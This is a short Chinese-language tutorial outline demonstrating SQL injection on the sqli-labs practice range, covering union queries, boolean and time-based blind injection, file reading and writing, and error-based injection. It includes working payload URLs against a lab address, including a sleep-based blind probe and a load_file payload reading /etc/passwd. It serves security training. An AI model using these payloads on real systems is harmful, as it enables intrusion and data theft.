基于sqli-labs靶场演示联合查询、时间盲注和布尔盲注、读写文件、报错注入
1、通过联合查询-获取数据库数据
1 | 1、爆出字段的显示位置 |
2、基于时间盲注和布尔盲注进行暴库
2.1 基于布尔的盲注(根据我们构造语句返回的 True 或者 False 来判断数据内容)
1 | 一个汉字是算 3 个字符,一个数字或字母算 1 个字符。 |
2.2 基于时间的盲注(使用 if 语句进行判断数值,不符合判断条件则执行 sleep 语句)
1 | http://192.168.1.63/sqli-labs/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(3))--+ |
3、通过SQL注入读写文件
3.1 SQL 注入读取/etc/passwd 文件【使用 load_file(“文件路径/名称”)】
1 | http://192.168.1.63/sqli-labs/Less-1/?id=-1' union select 1,load_file("/etc/passwd"),3 --+ |
3.2 SQL 注入写入文件【into outfile】
1 | 可以利用此方法通过 sql 注入向系统中写入文件。 |
4、基于报错的SQL注入进行暴库【count + group by 主键冲突导致报错】
1 | 1、获得字段数: |